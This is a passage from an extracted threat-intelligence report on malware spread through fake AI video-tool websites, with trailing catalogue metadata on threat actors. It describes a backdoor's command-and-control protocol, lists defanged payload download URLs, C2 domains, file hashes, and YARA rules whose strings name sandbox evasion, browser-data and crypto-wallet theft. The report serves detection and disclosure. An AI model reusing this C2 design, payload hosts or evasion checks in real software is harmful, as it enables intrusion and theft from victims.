BitKeep\r\nmijjdbgpgbflkaooedaemnlciddmamai Waves Keeper\r\nTable 11: List of browser extensions\r\nC2 Communication \r\nThe malware expects the C2 to respond by sending GZIP -compressed Protobuf messages with the following fields:\r\nregistry_val : A registry value under HKCU\\Software\\\u003cvictim_id\u003e to store the loader_bytes.\r\nloader_bytes : Assembly module to load the loaded_bytes (stored at registry in reverse order).\r\nloaded_bytes : GZIP-compressed assembly module to be loaded in-memory.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 22 of 28\n\nThe sample receives loader_bytes only in the first message as it stores it under the registry value HKCU\\Software\\\r\n\u003cvictim_id\u003e\\registry_val . For the subsequent messages, it only receives registry_val which it uses to fetch\r\nloader_bytes from the registry.\r\nThe sample sends empty GZIP -compressed Protobuf messages as a keep-alive mechanism until the C2 sends another\r\nassembly module to be loaded.\r\nThe malware has the ability to download and execute extra payloads from the following hardcoded URLs (this feature is not\r\nenabled in this sample):\r\nWebDriver2.exe : hxxps://github[.]com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll;\r\nchromedriver2.exe : hxxps://github[.]com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe\r\nmsedgedriver2.exe : hxxps://github[.]com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe\r\nThe files are WebDrivers for browsers that can be used for testing, automation, and interacting with the browser. They can\r\nalso be used by attackers for malicious purposes, such as deploying additional payloads.\r\nConclusion\r\nAs AI has gained tremendous momentum recently, our research highlights some of the ways in which threat actors have\r\ntaken advantage of it. Although our investigation was limited in scope, we discovered that well-crafted fake “AI websites”\r\npose a significant threat to both organizations and individual users. These AI tools no longer target just graphic designers;\r\nanyone can be lured in by a seemingly harmless ad. The temptation to try the latest AI tool can lead to anyone becoming a\r\nvictim. We advise users to exercise caution when engaging with AI tools and to verify the legitimacy of the website's\r\ndomain. \r\nAcknowledgements\r\nSpecial thanks to Stephen Eckels, Muhammad Umair, and Mustafa Nasser for their assistance in analyzing the malware\r\nsamples. Richmond Liclican for his inputs and attribution. Ervin Ocampo, Swapnil Patil, Muhammad Umer Khan, and\r\nMuhammad Hasib Latif for providing the detection opportunities.\r\nDetection Opportunities\r\nThe following indicators of compromise (IOCs) and YARA rules are also available as a collection and rule pack in Google\r\nThreat Intelligence (GTI). \r\nHost-Based IOCs\r\nFile SHA256 Notes\r\nLumalabs_1926326251082123689-\r\n626.zip\r\n8863065544df546920ce6189dd3f99ab3f5d644d3d9c440667c1476174ba862b\r\nDownloaded\r\nZIP archive\r\nLumalabs_1926326251082123689-\r\n626.mp4⠀.exe\r\nd3f50dc61d8c2be665a2d3933e2668448edc31546fea84517f8e61237c6d2e5d STARKVEIL\r\nC:\\winsystem\\heif\\heif.dll 839260ac321a44da55d4e6a5130c12869066af712f71c558bd42edd56074265b Launcher\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 23 of 28\n\n%APPDATA%\\Launcher\\libde265.dll  4982a33e0c2858980126b8279191cb4eddd0a35f936cf3eda079526ba7c76959 Persistence\r\n%APPDATA%\\python\\avcodec-61.dll 8d2c9c2b5af31e0e74185a82a816d3d019a0470a7ad8f5c1b40611aa1fd275cc GRIMPULL\r\n%APPDATA%\\pythonw\\heif.dll a0e75bd0b0fa0174566029d0e50875534c2fcc5ba982bd539bdeff506cae32d3 XWORM\r\nC:\\winsystem\\heif-info\\heif.dll 1a037da4103e38ff95cb0008a5e38fd6a8e7df5bc8e2d44e496b7a5909ddebeb XWORM\r\n%APPDATA%\\ffplay\\libde265.dll dcb1e9c6b066c2169928ae64e82343a250261f198eb5d091fd7928b69ed135d3 FROSTRIFT\r\nC:\\winsystem\\heif2rgb\\heif.dll e663c1ba289d890a74e33c7e99f872c9a7b63e385a6a4af10a856d5226c9a822 FROSTRIFT\r\nNetwork-Based IOCs\r\nMalware Command and Control\r\nDomain\r\nstrokes.zapto[.]org:7789\r\nartisanaqua[.]ddnsking[.]com:25699\r\nstrokes.zapto[.]org:56001\r\nFake AI Domains\r\nDomain Registration Date\r\ncreativepro[.]ai 2024-07-10\r\nboostcreatives[.]ai 2024-07-12\r\ncreativepro-ai[.]com 2024-08-02\r\nboostcreatives-ai[.]com 2024-08-04\r\ncreativespro-ai[.]com 2024-08-07\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 24 of 28\n\nklingxai[.]com 2024-09-19\r\nlumaai-labs[.]com 2024-09-29\r\nklings-ai[.]com 2024-10-17\r\nluma-dream[.]com 2024-10-26\r\nquirkquestai[.]com 2024-11-02\r\nlumaai-dream[.]com 2024-11-06\r\nlumaai-lab[.]com 2024-11-08\r\nlumaaidream[.]com 2024-11-09\r\nlumaailabs[.]com 2024-11-10\r\nluma-dreamai[.]com 2024-11-12\r\nai-kling[.]com 2024-11-22\r\ndreamai-luma[.]com 2024-12-13\r\naikling[.]ai 2025-01-04\r\naisoraplus[.]com 2025-01-07\r\nlumalabsai[.]in 2025-01-16\r\ncanvadream-lab[.]com 2025-01-20\r\ncanvadreamlab[.]com 2025-01-25\r\nadobe-express[.]com 2025-02-08\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 25 of 28\n\ncanva-dreamlab[.]com 2025-02-12\r\ncanvadreamlab[.]ai 2025-02-14\r\ncanvaproai[.]com 2025-02-17\r\ncapcutproai[.]com 2025-02-22\r\nluma-aidream[.]com 2025-02-27\r\nluma-dreammachine[.]com 2025-03-07\r\nYARA Rules\r\nrule G_Dropper_COILHATCH_1 {\r\nmeta:\r\nauthor = \"Mandiant\"\r\nstrings:\r\n$i1 = \"zlib.decompress\" ascii wide\r\n$i2 = \"rc4\" ascii wide\r\n$i3 = \"aes_decrypt\" ascii wide\r\n$i4 = \"xor\" ascii wide\r\n$i5 = \"rsa_decrypt\" ascii wide\r\n$r1 = \"private_key\" ascii wide\r\n$r2 = \"runner\" ascii wide\r\n$r3 = \"marshal\" ascii wide\r\n$r4 = \"marshal.loads\" ascii wide\r\n$r5 = \"b85decode\" ascii wide\r\n$r6 = \"exceute_func\" ascii wide\r\n$r7 = \"hybrid_decrypt\" ascii wide\r\ncondition:\r\n(4 of ($i*)) and all of ($r*)\r\n}\r\nrule G_Dropper_STARKVEIL_1 {\r\nmeta:\r\nauthor = \"Mandiant\"\r\nstrings:\r\n$p00_0 = { 56 57 53 48 83 EC ?? 48 8D AA [4] 48 8B 7D\r\n?? 48 8B 4F ?? FF 15 [4] 48 89 F9 }\r\n$p00_1 = { 0F 0B 66 0F 1F 84 00 [4] 48 89 54 24 ?? 55 41\r\n56 56 57 53 48 83 EC }\r\ncondition:\r\nuint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550\r\nand (($p00_0 in (48000 .. 59000) and $p00_1 in (100000 .. 120000)))\r\n}\r\nimport \"dotnet\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 26 of 28\n\nrule G_Downloader_GRIMPULL_1 {\r\nmeta:\r\nauthor = \"Mandiant\"\r\nstrings:\r\n$str1 = \"SbieDll.dll\" ascii wide\r\n$str2 = \"cuckoomon.dll\" ascii wide\r\n$str3 = \"vmGuestLib.dll\" ascii wide\r\n$str4 = \"select * from Win32_BIOS\" ascii wide\r\n$str5 = \"VMware|VIRTUAL|A M I|Xen\" ascii wide\r\n$str6 = \"Microsoft|VMWare|Virtual\" ascii wide\r\n$str7 = \"win32_process.handle='{0}'\" ascii wide\r\n$str8 = \"stealer\" ascii wide\r\n$code = { 11 20 11 0F 11 20 11 0F 91 11 1A 11 0F 91 61 D2 9C }\r\ncondition:\r\ndotnet.is_dotnet and all of them\r\n}\r\nrule G_Backdoor_FROSTRIFT_1 {\r\nmeta:\r\nauthor = \"Mandiant\"\r\nstrings:\r\n$guid = \"$23e83ead-ecb2-418f-9450-813fb7da66b8\"\r\n$r1 = \"IdentifiableDecryptor.DecryptorStack\"\r\n$r2 = \"$ProtoBuf.Explorers.ExplorerDecryptor\"\r\n$s1 = \"\\\\User Data\\\\\" wide\r\n$s2 = \"SELECT * FROM AntiVirusProduct\" wide\r\n$s3 = \"Telegram.exe\" wide\r\n$s4 = \"SELECT * FROM Win32_PnPEntity WHERE (PNPClass =\r\n'Image' OR PNPClass = 'Camera')\" wide\r\n$s5 = \"Litecoin-Qt\" wide\r\n$s6 = \"Bitcoin-Qt\" wide\r\ncondition:\r\nuint16(0) == 0x5a4d and (all of ($s*) or $guid or all of ($r*))\r\n}\r\nYARA-L Rules\r\nMandiant has made the relevant rules available in the Google SecOps Mandiant Intel Emerging Threats curated detections\r\nrule set. The activity discussed in the blog post is detected under the rule names:\r\nSuspicious Binary File Execution - MP4 Masquerade\r\nSuspicious Binary File Execution - Double Extension and Braille Pattern Blank Masquerade\r\nPython Script Deobfuscation - Base85 ZLib Marshal\r\nSuspicious Staging Directory WinSystem\r\nDLL Search Order Hijacking AVCodec61\r\nDLL Search Order Hijacking HEIF\r\nDLL Search Order Hijacking Libde265\r\nPosted in\r\nThreat Intelligence\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 27 of 28\n\nSource: https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites\r\nPage 28 of 28\n\nstrings: author = \"Mandiant\" \n $p00_0 = { 56 57 53 48 83 EC ?? 48 8D AA [4] 48 8B 7D\n?? 48 8B 4F ?? FF 15 [4] 48 89 F9 } \n $p00_1 = { 0F 0B 66 0F 1F 84 00 [4] 48 89 54 24 ?? 55 41\n56 56 57 53 48 83 EC } \ncondition: \n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550\nand (($p00_0 in (48000 .. 59000) and $p00_1 in (100000 .. 120000)))\n} \nimport \"dotnet\" \n Page 26 of 28", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites" ], "report_names": [ "cybercriminals-weaponize-fake-ai-websites" ], "threat_actors": [ { "id": "0661a292-80f3-420b-9951-a50e03c831c0", "created_at": "2023-01-06T13:46:38.928796Z", "updated_at": "2026-04-10T02:00:03.148052Z", "deleted_at": null, "main_name": "IRIDIUM", "aliases": [], "source_name": "MISPGALAXY:IRIDIUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "1081082f-c780-4f3f-8090-0952b4455230", "created_at": "2022-10-25T16:07:24.297942Z", "updated_at": "2026-04-10T02:00:04.92646Z", "deleted_at": null, "main_name": "TAG-38", "aliases": [], "source_name": "ETDA:TAG-38", "tools": [ "FRP", "Fast Reverse Proxy", "POISONPLUG.SHADOW", "ShadowPad Winnti", "XShellGhost" ], "source_id": "ETDA", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null }, { "id": "75455540-2f6e-467c-9225-8fe670e50c47", "created_at": "2022-10-25T16:07:23.740266Z", "updated_at": "2026-04-10T02:00:04.732992Z", "deleted_at": null, "main_name": "Iridium", "aliases": [], "source_name": "ETDA:Iridium", "tools": [ "CHINACHOPPER", "China Chopper", "LazyCat", "Powerkatz", "SinoChopper", "reGeorg" ], "source_id": "ETDA", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "66096816-7d20-483e-9683-33f2ed33f8ed", "created_at": "2026-01-20T02:00:03.65226Z", "updated_at": "2026-04-10T02:00:03.909091Z", "deleted_at": null, "main_name": "UNC6032", "aliases": [], "source_name": "MISPGALAXY:UNC6032", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434648, "ts_updated_at": 1775792228, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/7f70590d2c14a86dbe7cc3a31817710972e8179b.pdf", "text": "https://archive.orkl.eu/7f70590d2c14a86dbe7cc3a31817710972e8179b.txt", "img": "https://archive.orkl.eu/7f70590d2c14a86dbe7cc3a31817710972e8179b.jpg" } }